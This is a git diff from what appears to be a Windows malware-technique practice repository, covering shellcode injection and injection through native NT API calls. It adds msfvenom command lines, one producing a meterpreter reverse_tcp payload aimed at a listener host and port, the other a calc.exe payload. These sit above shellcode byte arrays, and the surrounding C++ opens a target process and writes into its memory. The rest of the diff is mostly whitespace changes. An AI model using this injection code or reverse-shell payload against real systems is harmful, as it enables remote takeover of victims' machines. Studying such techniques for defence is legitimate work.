diff --git a/3-shellcode-injection/main.cpp b/3-shellcode-injection/main.cpp index f91a714..7d045e5 100644 --- a/3-shellcode-injection/main.cpp +++ b/3-shellcode-injection/main.cpp @@ -5,6 +5,7 @@ #define log_err(msg, ...) printf("[-] " msg "\n", ##__VA_ARGS__) #define log_ok(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__) +// msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=172.24.224.1 LPORT=12345 -f c --var-name=g_shellcode char g_shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" "\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52" @@ -52,7 +53,7 @@ int main(int argc, char **argv) { DWORD pid = atoi(argv[1]); log_info("Opening process with pid %ld", pid); - + HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid); if (process == NULL) { log_err("Failed to open process: %ld", GetLastError()); diff --git a/7-native-api/main.cpp b/7-native-api/main.cpp index 0b4c684..383be78 100644 --- a/7-native-api/main.cpp +++ b/7-native-api/main.cpp @@ -8,6 +8,7 @@ #define log_err(msg, ...) log("[-] " msg, ##__VA_ARGS__) #define log_ok(msg, ...) log("[+] " msg, ##__VA_ARGS__) +// msfvenom --platform windows --arch x64 -p windows/x64/exec cmd=calc.exe -f c --var-name=g_shellcode unsigned char g_shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" @@ -51,7 +52,7 @@ int main(int argc, char **argv) { NtWaitForSingleObject nt_wait_for_single_object = NULL; // Grab NT API functions - { + { HMODULE ntdll_module = GetModuleHandleA("Ntdll"); if (ntdll_module == NULL) { log_err("Failed get Ntdll.dll: %ld", GetLastError()); @@ -87,16 +88,16 @@ int main(int argc, char **argv) { log_err("Failed get NtWriteVirtualMemory: %ld", GetLastError()); goto cleanup; } - + nt_wait_for_single_object = (NtWaitForSingleObject)GetProcAddress(ntdll_module, "NtWaitForSingleObject"); if (nt_wait_for_single_object == NULL) { log_err("Failed get NtWaitForSingleObject: %ld", GetLastError()); goto cleanup; } } - + // OpenProcess() - { + { OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL }; CLIENT_ID CID = { (HANDLE)pid, NULL };